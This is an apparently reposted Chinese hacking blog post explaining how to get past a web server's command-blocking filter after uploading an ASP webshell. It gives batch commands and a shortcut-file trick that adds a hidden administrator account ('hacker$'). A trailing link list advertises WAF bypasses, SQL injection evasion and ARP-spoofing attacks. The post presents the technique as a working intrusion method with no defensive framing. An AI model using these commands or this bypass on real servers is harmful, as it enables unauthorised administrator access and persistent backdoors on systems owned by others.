突破变态限制快捷方式提权法
来源:互联网 发布:罗比威廉姆斯 知乎 编辑:程序博客网 时间:2024/05/22 01:44
对于有突破一流信息拦截系统的网站,上传个马就不容易,好容易上传了,还不能执行命令,郁闷了..
执行命令提权的时候因为命令里有 net user 被拦截
换个思路。
运行批命令和直接执行命令效果是一样的,它既然不让执行net命令,我运行批命令还不行吗?
立刻动手,在asp马里点[新建文件] 把名字改称hacker.bat 在内容里写上:
net usernet user hacker$ /del
net usernet user hacker$ hacker /add
net localgroup administrators hacker$ /add
OK。保存!
晕!不成功!直接被拦....
郁闷了一会,又想个办法:在本地弄个批命令,然后上传,这拦截系统总不会对文件拦截吧?
OK。上传!
晕!www.2cto.com 又被拦!...
淫荡方法如下:
1、准备提权命令:%windir%\system32\cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add
2、新建快捷方式,在地址栏写入提权命令
3、上传这个快捷方式
4、在提权工具帮助下运行这个快捷方式.....
5、管理员添加成功....
此法可用于“QQ拼音”输入法帮助打开IE直接提权WIN8
0 0
- 突破变态限制快捷方式提权法
- 突破限制
- 突破搜索限制
- 突破局域网限制技巧
- 如何突破局域网限制
- 突破Select 1024 限制
- 突破 BTrace 安全限制
- 多开限制突破
- SqliteDev如何突破限制
- 突破const 限制
- 突破限制, 安装 ADT
- verycd 版权限制突破
- 匿名突破网络限制
- PGA突破pga_aggregate_target限制
- 多开限制突破
- 突破IOS7限制--1
- IOS7突破限制--2
- IOS突破限制--3
- 360网站卫士SQL注入绕过案例一个
- 绕过安全狗等一些WAF收集
- 利用kali嗅探周围发送的短信
- 【转载】Kali-linux安装之后的简单设置
- 5、CAS单点登录源码解析之【集成新浪腾讯微博】
- 突破变态限制快捷方式提权法
- 2003搭建VPN
- 安装Kali Linux 后需要做的 20 件事 - 51CTO.COM
- 中间人攻击-ARP毒化
- 分享上传图片shell的绕过过滤的几种方法
- WiFi安全测试工具WiFiPhisher
- 分享几种绕过防注入的方法
- 记录利用ettercap进行简单的arp欺骗和mitm攻击过程
- Ettercap结合sslstrip对ssl/https进行攻击